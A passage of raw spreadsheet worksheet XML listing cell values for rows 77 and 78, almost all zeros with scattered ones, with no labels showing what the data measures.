      </c>
      <c r="AK77">
        <v>0</v>
      </c>
      <c r="AL77">
        <v>0</v>
      </c>
      <c r="AM77">
        <v>0</v>
      </c>
      <c r="AN77">
        <v>1</v>
      </c>
      <c r="AO77">
        <v>0</v>
      </c>
      <c r="AP77">
        <v>0</v>
      </c>
      <c r="AQ77">
        <v>0</v>
      </c>
      <c r="AR77">
        <v>0</v>
      </c>
      <c r="AS77">
        <v>0</v>
      </c>
      <c r="AT77">
        <v>0</v>
      </c>
      <c r="AU77">
        <v>0</v>
      </c>
      <c r="AV77">
        <v>0</v>
      </c>
      <c r="AW77">
        <v>0</v>
      </c>
      <c r="AX77">
        <v>0</v>
      </c>
      <c r="AY77">
        <v>0</v>
      </c>
      <c r="AZ77">
        <v>0</v>
      </c>
      <c r="BA77">
        <v>0</v>
      </c>
      <c r="BB77">
        <v>0</v>
      </c>
      <c r="BC77">
        <v>0</v>
      </c>
      <c r="BD77">
        <v>0</v>
      </c>
      <c r="BE77">
        <v>0</v>
      </c>
      <c r="BF77">
        <v>0</v>
      </c>
      <c r="BG77">
        <v>0</v>
      </c>
      <c r="BH77">
        <v>0</v>
      </c>
      <c r="BI77">
        <v>0</v>
      </c>
      <c r="BJ77">
        <v>0</v>
      </c>
      <c r="BK77">
        <v>0</v>
      </c>
      <c r="BL77">
        <v>0</v>
      </c>
      <c r="BM77">
        <v>0</v>
      </c>
      <c r="BN77">
        <v>0</v>
      </c>
      <c r="BO77">
        <v>0</v>
      </c>
      <c r="BP77">
        <v>0</v>
      </c>
      <c r="BQ77">
        <v>0</v>
      </c>
      <c r="BR77">
        <v>0</v>
      </c>
      <c r="BS77">
        <v>0</v>
      </c>
      <c r="BT77">
        <v>0</v>
      </c>
      <c r="BU77">
        <v>0</v>
      </c>
      <c r="BV77">
        <v>0</v>
      </c>
      <c r="BW77">
        <v>0</v>
      </c>
      <c r="BX77">
        <v>0</v>
      </c>
      <c r="BY77">
        <v>0</v>
      </c>
      <c r="BZ77">
        <v>0</v>
      </c>
      <c r="CA77">
        <v>0</v>
      </c>
      <c r="CB77">
        <v>0</v>
      </c>
      <c r="CC77">
        <v>0</v>
      </c>
      <c r="CD77">
        <v>0</v>
      </c>
      <c r="CE77">
        <v>0</v>
      </c>
      <c r="CF77">
        <v>0</v>
      </c>
      <c r="CG77">
        <v>0</v>
      </c>
      <c r="CH77">
        <v>0</v>
      </c>
      <c r="CI77">
        <v>0</v>
      </c>
      <c r="CJ77">
        <v>0</v>
      </c>
      <c r="CK77">
        <v>0</v>
      </c>
      <c r="CL77">
        <v>0</v>
      </c>
      <c r="CM77">
        <v>0</v>
      </c>
      <c r="CN77">
        <v>0</v>
      </c>
      <c r="CO77">
        <v>0</v>
      </c>
      <c r="CP77">
        <v>0</v>
      </c>
      <c r="CQ77">
        <v>0</v>
      </c>
      <c r="CR77">
        <v>0</v>
      </c>
      <c r="CS77">
        <v>0</v>
      </c>
      <c r="CT77">
        <v>0</v>
      </c>
      <c r="CU77">
        <v>0</v>
      </c>
      <c r="CV77">
        <v>0</v>
      </c>
      <c r="CW77">
        <v>0</v>
      </c>
      <c r="CX77">
        <v>0</v>
      </c>
      <c r="CY77">
        <v>0</v>
      </c>
      <c r="CZ77">
        <v>0</v>
      </c>
      <c r="DA77">
        <v>0</v>
      </c>
      <c r="DB77">
        <v>0</v>
      </c>
      <c r="DC77">
        <v>0</v>
      </c>
      <c r="DD77">
        <v>0</v>
      </c>
      <c r="DE77">
        <v>0</v>
      </c>
      <c r="DF77">
        <v>0</v>
      </c>
      <c r="DG77">
        <v>0</v>
      </c>
      <c r="DH77">
        <v>0</v>
      </c>
      <c r="DI77">
        <v>0</v>
      </c>
      <c r="DJ77">
        <v>0</v>
      </c>
      <c r="DK77">
        <v>0</v>
      </c>
      <c r="DL77">
        <v>0</v>
      </c>
      <c r="DM77">
        <v>0</v>
      </c>
      <c r="DN77">
        <v>0</v>
      </c>
      <c r="DO77">
        <v>0</v>
      </c>
      <c r="DP77">
        <v>0</v>
      </c>
      <c r="DQ77">
        <v>0</v>
      </c>
      <c r="DR77">
        <v>0</v>
      </c>
      <c r="DS77">
        <v>0</v>
      </c>
      <c r="DT77">
        <v>0</v>
      </c>
      <c r="DU77">
        <v>0</v>
      </c>
      <c r="DV77">
        <v>0</v>
      </c>
      <c r="DW77">
        <v>1</v>
      </c>
      <c r="DX77">
        <v>0</v>
      </c>
      <c r="DY77">
        <v>0</v>
      </c>
      <c r="DZ77">
        <v>0</v>
      </c>
      <c r="EA77">
        <v>0</v>
      </c>
      <c r="EB77">
        <v>1</v>
      </c>
      <c r="EC77">
        <v>0</v>
      </c>
      <c r="ED77">
        <v>0</v>
      </c>
      <c r="EE77">
        <v>0</v>
      </c>
      <c r="EF77">
        <v>0</v>
      </c>
      <c r="EG77">
        <v>0</v>
      </c>
      <c r="EH77">
        <v>0</v>
      </c>
      <c r="EI77">
        <v>0</v>
      </c>
      <c r="EJ77">
        <v>0</v>
      </c>
      <c r="EK77">
        <v>0</v>
      </c>
      <c r="EL77">
        <v>0</v>
      </c>
      <c r="EM77">
        <v>0</v>
      </c>
      <c r="EN77">
        <v>0</v>
      </c>
      <c r="EO77">
        <v>0</v>
      </c>
      <c r="EP77">
        <v>0</v>
      </c>
      <c r="EQ77">
        <v>0</v>
      </c>
      <c r="ER77">
        <v>0</v>
      </c>
      <c r="ES77">
        <v>0</v>
      </c>
      <c r="ET77">
        <v>0</v>
      </c>
      <c r="EU77">
        <v>0</v>
      </c>
      <c r="EV77">
        <v>0</v>
      </c>
      <c r="EW77">
        <v>0</v>
      </c>
      <c r="EX77">
        <v>0</v>
      </c>
      <c r="EY77">
        <v>0</v>
      </c>
      <c r="EZ77">
        <v>0</v>
      </c>
      <c r="FA77">
        <v>0</v>
      </c>
      <c r="FB77">
        <v>0</v>
      </c>
      <c r="FC77">
        <v>0</v>
      </c>
      <c r="FD77">
        <v>0</v>
      </c>
      <c r="FE77">
        <v>0</v>
      </c>
      <c r="FF77">
        <v>0</v>
      </c>
      <c r="FG77">
        <v>1</v>
      </c>
      <c r="FH77">
        <v>0</v>
      </c>
      <c r="FI77">
        <v>0</v>
      </c>
      <c r="FJ77">
        <v>0</v>
      </c>
      <c r="FK77">
        <v>0</v>
      </c>
      <c r="FL77">
        <v>0</v>
      </c>
      <c r="FM77">
        <v>0</v>
      </c>
      <c r="FN77">
        <v>0</v>
      </c>
      <c r="FO77">
        <v>0</v>
      </c>
      <c r="FP77">
        <v>0</v>
      </c>
      <c r="FQ77">
        <v>0</v>
      </c>
      <c r="FR77">
        <v>0</v>
      </c>
      <c r="FS77">
        <v>0</v>
      </c>
      <c r="FT77">
        <v>0</v>
      </c>
      <c r="FU77">
        <v>0</v>
      </c>
      <c r="FV77">
        <v>0</v>
      </c>
      <c r="FW77">
        <v>0</v>
      </c>
      <c r="FX77">
        <v>0</v>
      </c>
      <c r="FY77">
        <v>0</v>
      </c>
      <c r="FZ77">
        <v>0</v>
      </c>
      <c r="GA77">
        <v>0</v>
      </c>
      <c r="GB77">
        <v>0</v>
      </c>
      <c r="GC77">
        <v>0</v>
      </c>
      <c r="GD77">
        <v>0</v>
      </c>
      <c r="GE77">
        <v>0</v>
      </c>
      <c r="GF77">
        <v>1</v>
      </c>
      <c r="GG77">
        <v>0</v>
      </c>
      <c r="GH77">
        <v>0</v>
      </c>
      <c r="GI77">
        <v>0</v>
      </c>
      <c r="GJ77">
        <v>0</v>
      </c>
      <c r="GK77">
        <v>0</v>
      </c>
      <c r="GL77">
        <v>0</v>
      </c>
      <c r="GM77">
        <v>0</v>
      </c>
      <c r="GN77">
        <v>0</v>
      </c>
      <c r="GO77">
        <v>0</v>
      </c>
      <c r="GP77">
        <v>0</v>
      </c>
      <c r="GQ77">
        <v>0</v>
      </c>
      <c r="GR77">
        <v>0</v>
      </c>
      <c r="GS77">
        <v>0</v>
      </c>
      <c r="GT77">
        <v>0</v>
      </c>
      <c r="GU77">
        <v>0</v>
      </c>
      <c r="GV77">
        <v>0</v>
      </c>
      <c r="GW77">
        <v>0</v>
      </c>
      <c r="GX77">
        <v>1</v>
      </c>
      <c r="GY77">
        <v>0</v>
      </c>
      <c r="GZ77">
        <v>0</v>
      </c>
      <c r="HA77">
        <v>0</v>
      </c>
      <c r="HB77">
        <v>0</v>
      </c>
      <c r="HC77">
        <v>0</v>
      </c>
      <c r="HD77">
        <v>0</v>
      </c>
      <c r="HE77">
        <v>0</v>
      </c>
      <c r="HF77">
        <v>0</v>
      </c>
      <c r="HG77">
        <v>0</v>
      </c>
      <c r="HH77">
        <v>0</v>
      </c>
      <c r="HI77">
        <v>0</v>
      </c>
      <c r="HJ77">
        <v>0</v>
      </c>
      <c r="HK77">
        <v>0</v>
      </c>
      <c r="HL77">
        <v>0</v>
      </c>
      <c r="HM77">
        <v>0</v>
      </c>
      <c r="HN77">
        <v>0</v>
      </c>
      <c r="HO77">
        <v>0</v>
      </c>
      <c r="HP77">
        <v>0</v>
      </c>
      <c r="HQ77">
        <v>0</v>
      </c>
      <c r="HR77">
        <v>0</v>
      </c>
      <c r="HS77">
        <v>0</v>
      </c>
      <c r="HT77">
        <v>0</v>
      </c>
      <c r="HU77">
        <v>0</v>
      </c>
      <c r="HV77">
        <v>0</v>
      </c>
      <c r="HW77">
        <v>0</v>
      </c>
      <c r="HX77">
        <v>0</v>
      </c>
      <c r="HY77">
        <v>0</v>
      </c>
      <c r="HZ77">
        <v>0</v>
      </c>
      <c r="IA77">
        <v>0</v>
      </c>
      <c r="IB77">
        <v>0</v>
      </c>
      <c r="IC77">
        <v>0</v>
      </c>
      <c r="ID77">
        <v>0</v>
      </c>
      <c r="IE77">
        <v>0</v>
      </c>
      <c r="IF77">
        <v>0</v>
      </c>
      <c r="IG77">
        <v>0</v>
      </c>
      <c r="IH77">
        <v>0</v>
      </c>
      <c r="II77">
        <v>0</v>
      </c>
      <c r="IJ77">
        <v>0</v>
      </c>
      <c r="IK77">
        <v>0</v>
      </c>
      <c r="IL77">
        <v>0</v>
      </c>
      <c r="IM77">
        <v>0</v>
      </c>
      <c r="IN77">
        <v>0</v>
      </c>
      <c r="IO77">
        <v>0</v>
      </c>
      <c r="IP77">
        <v>0</v>
      </c>
      <c r="IQ77">
        <v>0</v>
      </c>
      <c r="IR77">
        <v>0</v>
      </c>
      <c r="IS77">
        <v>0</v>
      </c>
      <c r="IT77">
        <v>0</v>
      </c>
      <c r="IU77">
        <v>0</v>
      </c>
      <c r="IV77">
        <v>0</v>
      </c>
      <c r="IW77">
        <v>0</v>
      </c>
      <c r="IX77">
        <v>0</v>
      </c>
      <c r="IY77">
        <v>0</v>
      </c>
      <c r="IZ77">
        <v>0</v>
      </c>
      <c r="JA77">
        <v>0</v>
      </c>
      <c r="JB77">
        <v>0</v>
      </c>
      <c r="JC77">
        <v>0</v>
      </c>
      <c r="JD77">
        <v>0</v>
      </c>
      <c r="JE77">
        <v>0</v>
      </c>
      <c r="JF77">
        <v>0</v>
      </c>
      <c r="JG77">
        <v>0</v>
      </c>
      <c r="JH77">
        <v>0</v>
      </c>
      <c r="JI77">
        <v>0</v>
      </c>
      <c r="JJ77">
        <v>0</v>
      </c>
      <c r="JK77">
        <v>0</v>
      </c>
      <c r="JL77">
        <v>0</v>
      </c>
      <c r="JM77">
        <v>0</v>
      </c>
      <c r="JN77">
        <v>0</v>
      </c>
      <c r="JO77">
        <v>0</v>
      </c>
      <c r="JP77">
        <v>1</v>
      </c>
      <c r="JQ77">
        <v>0</v>
      </c>
      <c r="JR77">
        <v>0</v>
      </c>
      <c r="JS77">
        <v>0</v>
      </c>
      <c r="JT77">
        <v>0</v>
      </c>
      <c r="JU77">
        <v>0</v>
      </c>
      <c r="JV77">
        <v>0</v>
      </c>
      <c r="JW77">
        <v>0</v>
      </c>
      <c r="JX77">
        <v>0</v>
      </c>
      <c r="JY77">
        <v>0</v>
      </c>
      <c r="JZ77">
        <v>0</v>
      </c>
      <c r="KA77">
        <v>0</v>
      </c>
      <c r="KB77">
        <v>0</v>
      </c>
      <c r="KC77">
        <v>0</v>
      </c>
      <c r="KD77">
        <v>0</v>
      </c>
      <c r="KE77">
        <v>0</v>
      </c>
      <c r="KF77">
        <v>0</v>
      </c>
      <c r="KG77">
        <v>0</v>
      </c>
      <c r="KH77">
        <v>0</v>
      </c>
      <c r="KI77">
        <v>0</v>
      </c>
      <c r="KJ77">
        <v>0</v>
      </c>
      <c r="KK77">
        <v>0</v>
      </c>
      <c r="KL77">
        <v>0</v>
      </c>
      <c r="KM77">
        <v>0</v>
      </c>
      <c r="KN77">
        <v>0</v>
      </c>
      <c r="KO77">
        <v>0</v>
      </c>
      <c r="KP77">
        <v>0</v>
      </c>
      <c r="KQ77">
        <v>0</v>
      </c>
      <c r="KR77">
        <v>0</v>
      </c>
      <c r="KS77">
        <v>0</v>
      </c>
      <c r="KT77">
        <v>0</v>
      </c>
      <c r="KU77">
        <v>0</v>
      </c>
      <c r="KV77">
        <v>0</v>
      </c>
      <c r="KW77">
        <v>0</v>
      </c>
      <c r="KX77">
        <v>0</v>
      </c>
      <c r="KY77">
        <v>0</v>
      </c>
      <c r="KZ77">
        <v>0</v>
      </c>
      <c r="LA77">
        <v>0</v>
      </c>
      <c r="LB77">
        <v>0</v>
      </c>
      <c r="LC77">
        <v>0</v>
      </c>
      <c r="LD77">
        <v>0</v>
      </c>
      <c r="LE77">
        <v>0</v>
      </c>
      <c r="LF77">
        <v>0</v>
      </c>
      <c r="LG77">
        <v>0</v>
      </c>
      <c r="LH77">
        <v>0</v>
      </c>
      <c r="LI77">
        <v>0</v>
      </c>
      <c r="LJ77">
        <v>0</v>
      </c>
      <c r="LK77">
        <v>0</v>
      </c>
      <c r="LL77">
        <v>0</v>
      </c>
      <c r="LM77">
        <v>0</v>
      </c>
      <c r="LN77">
        <v>0</v>
      </c>
      <c r="LO77">
        <v>0</v>
      </c>
      <c r="LP77">
        <v>0</v>
      </c>
      <c r="LQ77">
        <v>0</v>
      </c>
      <c r="LR77">
        <v>0</v>
      </c>
      <c r="LS77">
        <v>0</v>
      </c>
      <c r="LT77">
        <v>0</v>
      </c>
      <c r="LU77">
        <v>0</v>
      </c>
      <c r="LV77">
        <v>0</v>
      </c>
      <c r="LW77">
        <v>0</v>
      </c>
      <c r="LX77">
        <v>0</v>
      </c>
      <c r="LY77">
        <v>0</v>
      </c>
      <c r="LZ77">
        <v>0</v>
      </c>
      <c r="MA77">
        <v>0</v>
      </c>
      <c r="MB77">
        <v>0</v>
      </c>
      <c r="MC77">
        <v>0</v>
      </c>
      <c r="MD77">
        <v>0</v>
      </c>
      <c r="ME77">
        <v>0</v>
      </c>
      <c r="MF77">
        <v>0</v>
      </c>
      <c r="MG77">
        <v>0</v>
      </c>
      <c r="MH77">
        <v>0</v>
      </c>
      <c r="MI77">
        <v>0</v>
      </c>
      <c r="MJ77">
        <v>0</v>
      </c>
      <c r="MK77">
        <v>0</v>
      </c>
      <c r="ML77">
        <v>0</v>
      </c>
      <c r="MM77">
        <v>0</v>
      </c>
      <c r="MN77">
        <v>0</v>
      </c>
      <c r="MO77">
        <v>0</v>
      </c>
      <c r="MP77">
        <v>0</v>
      </c>
      <c r="MQ77">
        <v>0</v>
      </c>
      <c r="MR77">
        <v>0</v>
      </c>
      <c r="MS77">
        <v>0</v>
      </c>
      <c r="MT77">
        <v>0</v>
      </c>
      <c r="MU77">
        <v>0</v>
      </c>
      <c r="MV77">
        <v>0</v>
      </c>
      <c r="MW77">
        <v>0</v>
      </c>
      <c r="MX77">
        <v>0</v>
      </c>
      <c r="MY77">
        <v>0</v>
      </c>
      <c r="MZ77">
        <v>0</v>
      </c>
      <c r="NA77">
        <v>0</v>
      </c>
      <c r="NB77">
        <v>0</v>
      </c>
      <c r="NC77">
        <v>0</v>
      </c>
      <c r="ND77">
        <v>0</v>
      </c>
      <c r="NE77">
        <v>0</v>
      </c>
      <c r="NF77">
        <v>0</v>
      </c>
      <c r="NG77">
        <v>0</v>
      </c>
      <c r="NH77">
        <v>0</v>
      </c>
      <c r="NI77">
        <v>0</v>
      </c>
      <c r="NJ77">
        <v>0</v>
      </c>
      <c r="NK77">
        <v>1</v>
      </c>
      <c r="NL77">
        <v>0</v>
      </c>
      <c r="NM77">
        <v>0</v>
      </c>
      <c r="NN77">
        <v>0</v>
      </c>
      <c r="NO77">
        <v>0</v>
      </c>
      <c r="NP77">
        <v>0</v>
      </c>
      <c r="NQ77">
        <v>0</v>
      </c>
      <c r="NR77">
        <v>0</v>
      </c>
      <c r="NS77">
        <v>0</v>
      </c>
      <c r="NT77">
        <v>0</v>
      </c>
      <c r="NU77">
        <v>0</v>
      </c>
      <c r="NV77">
        <v>0</v>
      </c>
      <c r="NW77">
        <v>0</v>
      </c>
      <c r="NX77">
        <v>0</v>
      </c>
      <c r="NY77">
        <v>0</v>
      </c>
      <c r="NZ77">
        <v>0</v>
      </c>
      <c r="OA77">
        <v>0</v>
      </c>
      <c r="OB77">
        <v>0</v>
      </c>
      <c r="OC77">
        <v>0</v>
      </c>
      <c r="OD77">
        <v>0</v>
      </c>
      <c r="OE77">
        <v>0</v>
      </c>
      <c r="OF77">
        <v>0</v>
      </c>
      <c r="OG77">
        <v>0</v>
      </c>
      <c r="OH77">
        <v>0</v>
      </c>
      <c r="OI77">
        <v>0</v>
      </c>
      <c r="OJ77">
        <v>0</v>
      </c>
      <c r="OK77">
        <v>0</v>
      </c>
      <c r="OL77">
        <v>0</v>
      </c>
      <c r="OM77">
        <v>0</v>
      </c>
      <c r="ON77">
        <v>0</v>
      </c>
      <c r="OO77">
        <v>0</v>
      </c>
      <c r="OP77">
        <v>0</v>
      </c>
      <c r="OQ77">
        <v>0</v>
      </c>
      <c r="OR77">
        <v>1</v>
      </c>
      <c r="OS77">
        <v>0</v>
      </c>
      <c r="OT77">
        <v>0</v>
      </c>
      <c r="OU77">
        <v>0</v>
      </c>
      <c r="OV77">
        <v>0</v>
      </c>
      <c r="OW77">
        <v>0</v>
      </c>
      <c r="OX77">
        <v>0</v>
      </c>
      <c r="OY77">
        <v>0</v>
      </c>
      <c r="OZ77">
        <v>0</v>
      </c>
      <c r="PA77">
        <v>0</v>
      </c>
      <c r="PB77">
        <v>0</v>
      </c>
      <c r="PC77">
        <v>0</v>
      </c>
      <c r="PD77">
        <v>0</v>
      </c>
      <c r="PE77">
        <v>0</v>
      </c>
      <c r="PF77">
        <v>0</v>
      </c>
      <c r="PG77">
        <v>0</v>
      </c>
      <c r="PH77">
        <v>0</v>
      </c>
      <c r="PI77">
        <v>0</v>
      </c>
      <c r="PJ77">
        <v>0</v>
      </c>
      <c r="PK77">
        <v>0</v>
      </c>
      <c r="PL77">
        <v>0</v>
      </c>
      <c r="PM77">
        <v>0</v>
      </c>
      <c r="PN77">
        <v>0</v>
      </c>
      <c r="PO77">
        <v>0</v>
      </c>
      <c r="PP77">
        <v>0</v>
      </c>
      <c r="PQ77">
        <v>0</v>
      </c>
      <c r="PR77">
        <v>0</v>
      </c>
      <c r="PS77">
        <v>0</v>
      </c>
      <c r="PT77">
        <v>0</v>
      </c>
      <c r="PU77">
        <v>0</v>
      </c>
      <c r="PV77">
        <v>0</v>
      </c>
      <c r="PW77">
        <v>0</v>
      </c>
      <c r="PX77">
        <v>0</v>
      </c>
      <c r="PY77">
        <v>0</v>
      </c>
      <c r="PZ77">
        <v>0</v>
      </c>
      <c r="QA77">
        <v>0</v>
      </c>
      <c r="QB77">
        <v>0</v>
      </c>
      <c r="QC77">
        <v>0</v>
      </c>
      <c r="QD77">
        <v>0</v>
      </c>
      <c r="QE77">
        <v>0</v>
      </c>
      <c r="QF77">
        <v>0</v>
      </c>
      <c r="QG77">
        <v>0</v>
      </c>
      <c r="QH77">
        <v>0</v>
      </c>
      <c r="QI77">
        <v>0</v>
      </c>
      <c r="QJ77">
        <v>0</v>
      </c>
      <c r="QK77">
        <v>0</v>
      </c>
      <c r="QL77">
        <v>0</v>
      </c>
      <c r="QM77">
        <v>0</v>
      </c>
      <c r="QN77">
        <v>0</v>
      </c>
      <c r="QO77">
        <v>0</v>
      </c>
      <c r="QP77">
        <v>0</v>
      </c>
      <c r="QQ77">
        <v>0</v>
      </c>
      <c r="QR77">
        <v>0</v>
      </c>
      <c r="QS77">
        <v>0</v>
      </c>
      <c r="QT77">
        <v>0</v>
      </c>
      <c r="QU77">
        <v>0</v>
      </c>
      <c r="QV77">
        <v>0</v>
      </c>
      <c r="QW77">
        <v>0</v>
      </c>
      <c r="QX77">
        <v>0</v>
      </c>
      <c r="QY77">
        <v>0</v>
      </c>
      <c r="QZ77">
        <v>0</v>
      </c>
      <c r="RA77">
        <v>0</v>
      </c>
      <c r="RB77">
        <v>0</v>
      </c>
      <c r="RC77">
        <v>0</v>
      </c>
      <c r="RD77">
        <v>0</v>
      </c>
      <c r="RE77">
        <v>0</v>
      </c>
      <c r="RF77">
        <v>0</v>
      </c>
      <c r="RG77">
        <v>0</v>
      </c>
      <c r="RH77">
        <v>0</v>
      </c>
      <c r="RI77">
        <v>0</v>
      </c>
      <c r="RJ77">
        <v>0</v>
      </c>
      <c r="RK77">
        <v>0</v>
      </c>
      <c r="RL77">
        <v>0</v>
      </c>
      <c r="RM77">
        <v>0</v>
      </c>
      <c r="RN77">
        <v>0</v>
      </c>
      <c r="RO77">
        <v>0</v>
      </c>
      <c r="RP77">
        <v>0</v>
      </c>
      <c r="RQ77">
        <v>0</v>
      </c>
      <c r="RR77">
        <v>0</v>
      </c>
      <c r="RS77">
        <v>0</v>
      </c>
      <c r="RT77">
        <v>0</v>
      </c>
      <c r="RU77">
        <v>0</v>
      </c>
      <c r="RV77">
        <v>0</v>
      </c>
      <c r="RW77">
        <v>0</v>
      </c>
      <c r="RX77">
        <v>0</v>
      </c>
      <c r="RY77">
        <v>0</v>
      </c>
      <c r="RZ77">
        <v>0</v>
      </c>
      <c r="SA77">
        <v>0</v>
      </c>
    </row>
    <row r="78" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A78" s="6" t="s">
        <v>3236</v>
      </c>
      <c r="B78">
        <v>7</v>
      </c>
      <c r="C78">
        <v>0</v>
      </c>
      <c r="D78">
        <v>0</v>
      </c>
      <c r="E78">
        <v>0</v>
      </c>
      <c r="F78">
        <v>0</v>
      </c>
      <c r="G78">
        <v>0</v>
      </c>
      <c r="H78">
        <v>0</v>
      </c>
      <c r="I78">
        <v>0</v>
      </c>
      <c r="J78">
        <v>0</v>
      </c>
      <c r="K78">
        <v>0</v>
      </c>
      <c r="L78">
        <v>0</v>
      </c>
      <c r="M78">
        <v>0</v>
      </c>
      <c r="N78">
        <v>0</v>
      </c>
      <c r="O78">
        <v>0</v>
      </c>
      <c r="P78">
        <v>0</v>
      </c>
      <c r="Q78">
        <v>0</v>
      </c>
      <c r="R78">
        <v>0</v>
      </c>
      <c r="S78">
        <v>0</v>
      </c>
      <c r="T78">
        <v>0</v>
      </c>
      <c r="U78">
        <v>0</v>
      </c>
      <c r="V78">
        <v>0</v>
      </c>
      <c r="W78">
        <v>0</v>
      </c>
      <c r="X78">
        <v>0</v>
      </c>
      <c r="Y78">
        <v>0</v>
      </c>
      <c r="Z78">
        <v>0</v>
      </c>
      <c r="AA78">
        <v>0</v>
      </c>
      <c r="AB78">
        <v>0</v>
      </c>
      <c r="AC78">
        <v>0</v>
      </c>
      <c r="AD78">
        <v>0</v>
      </c>
      <c r="AE78">
        <v>0</v>
      </c>
      <c r="AF78">
        <v>0</v>
      </c>
      <c r="AG78">
        <v>0</v>
      </c>
      <c r="AH78">
        <v>0</v>
      </c>
      <c r="AI78">
        <v>0</v>
      </c>
      <c r="AJ78">
        <v>0</v>
      </c>
      <c r="AK78">
        <v>0</v>
      </c>
      <c r="AL78">
        <v>0</v>
      </c>
      <c r="AM78">
        <v>0</v>
      </c>
      <c r="AN78">
        <v>0</v>
      </c>
      <c r="AO78">
        <v>0</v>
      </c>
      <c r="AP78">
        <v>0</v>
      </c>
      <c r="AQ78">
        <v>0</v>
      </c>
      <c r="AR78">
        <v>0</v>
      </c>
      <c r="AS78">
        <v>0</v>
      </c>
      <c r="AT78">
        <v>0</v>
      </c>
      <c r="AU78">
        <v>0</v>
      </c>
      <c r="AV78">
        <v>0</v>
      </c>
      <c r="AW78">
        <v>0</v>
      </c>
      <c r="AX78">
        <v>0</v>
      </c>
      <c r="AY78">
        <v>0</v>
      </c>
      <c r="AZ78">
        <v>0</v>
      </c>
      <c r="BA78">
        <v>0</v>
      </c>
      <c r="BB78">
        <v>0</v>
      </c>
      <c r="BC78">
        <v>0</v>
      </c>
      <c r="BD78">
        <v>0</v>
      </c>
      <c r="BE78">
        <v>0</v>
      </c>
      <c r="BF78">
        <v>0</v>
      </c>
      <c r="BG78">
        <v>0</v>
      </c>
      <c r="BH78">
        <v>0</v>
      </c>
      <c r="BI78">
        <v>0</v>
      </c>
      <c r="BJ78">
        <v>0</v>
      </c>
      <c r="BK78">
        <v>0</v>
      </c>
      <c r="BL78">
        <v>0</v>
      </c>
      <c r="BM78">
        <v>0</v>
      </c>
      <c r="BN78">
        <v>0</v>
      </c>
      <c r="BO78">
        <v>0</v>
      </c>
      <c r="BP78">
        <v>0</v>
      </c>
      <c r="BQ78">
        <v>0</v>
      </c>
      <c r="BR78">
        <v>0</v>
      </c>
      <c r="BS78">
        <v>0</v>
      </c>
      <c r="BT78">
        <v>0</v>
      </c>
      <c r="BU78">
        <v>0</v>
      </c>
      <c r="BV78">
        <v>0</v>
      </c>
      <c r="BW78">
        <v>0</v>
      </c>
      <c r="BX78">
        <v>0</v>
      </c>
      <c r="BY78">
        <v>0</v>
      </c>
      <c r="BZ78">
        <v>0</v>
      </c>
      <c r="CA78">
        <v>0</v>
      </c>
      <c r="CB78">
        <v>0</v>
      </c>
      <c r="CC78">
        <v>0</v>
      </c>
      <c r="CD78">
        <v>0</v>
      </c>
      <c r="CE78">
        <v>0</v>
      </c>
      <c r="CF78">
        <v>0</v>
      </c>
      <c r="CG78">
        <v>0</v>
      </c>
      <c r="CH78">
        <v>0</v>
      </c>
      <c r="CI78">
        <v>0</v>
      </c>
      <c r="CJ78">
        <v>0</v>
      </c>
      <c r="CK78">
        <v>0</v>
      </c>
      <c r="CL78">
        <v>0</v>
      </c>
      <c r="CM78">
        <v>0</v>
      </c>
      <c r="CN78">
        <v>0</v>
      </c>
      <c r="CO78">
        <v>0</v>
      </c>
      <c r="CP78">
        <v>0</v>
      </c>
      <c r="CQ78">
        <v>1</v>
      </c>
      <c r="CR78">
        <v>0</v>
      </c>
      <c r="CS78">
        <v>0</v>
      </c>
      <c r="CT78">
        <v>0</v>
      </c>
      <c r="CU78">
        <v>0</v>
      </c>
      <c r="CV78">
        <v>0</v>
      </c>
      <c r="CW78">
        <v>0</v>
      </c>
      <c r="CX78">
        <v>0</v>
      </c>
      <c r="CY78">
        <v>0</v>
      </c>
      <c r="CZ78">
        <v>0</v>
      </c>
      <c r="DA78">
        <v>0</v>
      </c>
      <c r="DB78">
        <v>0</v>
      </c>
      <c r="DC78">
        <v>0</v>
      </c>
      <c r="DD78">
        <v>1</v>
      </c>
      <c r="DE78">
        <v>0</v>
      </c>
      <c r="DF78">
        <v>0</v>
      </c>
      <c r="DG78">
        <v>0</v>
      </c>
      <c r="DH78">
        <v>0</v>
      </c>
      <c r="DI78">
        <v>0</v>
      </c>
      <c r="DJ78">
        <v>0</v>
      </c>
      <c r="DK78">
        <v>0</v>
      </c>
      <c r="DL78">
        <v>0</v>
      </c>
      <c r="DM78">
        <v>0</v>
      </c>
      <c r="DN78">
        <v>0</v>
      </c>
      <c r="DO78">
        <v>0</v>
      </c>
      <c r="DP78">
        <v>0</v>
      </c>
      <c r="DQ78">
        <v>0</v>
      </c>
      <c r="DR78">
        <v>0</v>
      </c>
      <c r="DS78">
        <v>0</v>
      </c>
      <c r="DT78">
        <v>0</v>
      </c>
      <c r="DU78">
        <v>0</v>
      </c>
      <c r="DV78">
        <v>0</v>
      </c>
      <c r="DW78">
        <v>0</v>
      </c>
      <c r="DX78">
        <v>0</v>
      </c>
      <c r="DY78">
        <v>0</v>
      </c>
      <c r="DZ78">
        <v>0</v>
      </c>
      <c r="EA78">
        <v>0</v>
      </c>
      <c r="EB78">
        <v>0</v>
      </c>
      <c r="EC78">
        <v>0</v>
      </c>
      <c r="ED78">
        <v>0</v>
      </c>
      <c r="EE78">
        <v>0</v>
      </c>
      <c r="EF78">
        <v>0</v>
      </c>
      <c r="EG78">
        <v>0</v>
      </c>
      <c r="EH78">
        <v>0</v>
      </c>
      <c r="EI78">
        <v>0</v>
      </c>
      <c r="EJ78">
        <v>0</v>
      </c>
      <c r="EK78">
        <v>0</v>
      </c>
      <c r="EL78">
        <v>0</v>
      </c>
      <c r="EM78">
        <v>0</v>
      </c>
      <c r="EN78">
        <v>0</v>
      </c>
      <c r="EO78">
        <v>0</v>
      </c>
      <c r="EP78">
        <v>0</v>
      </c>
      <c r="EQ78">
        <v>0</v>
      </c>
      <c r="ER78">
        <v>0</v>
      </c>
      <c r="ES78">
        <v>0</v>
      </c>
      <c r="ET78">
        <v>0</v>
      </c>
      <c r="EU78">
        <v>0</v>
      </c>
      <c r="EV78">
        <v>0</v>
      </c>
      <c r="EW78">
        <v>0</v>
      </c>
      <c r="EX78">
        <v>0</v>
      </c>
      <c r="EY78">
        <v>0</v>
      </c>
      <c r="EZ78">
        <v>0</v>
      </c>
      <c r="FA78">
        <v>0</v>
      </c>
      <c r="FB78">
        <v>0</v>
      </c>
      <c r="FC78">
        <v>0</v>
      </c>
      <c r="FD78">
        <v>0</v>
      </c>
      <c r="FE78">
        <v>1</v>
      </c>
      <c r="FF78">
        <v>0</v>
      </c>
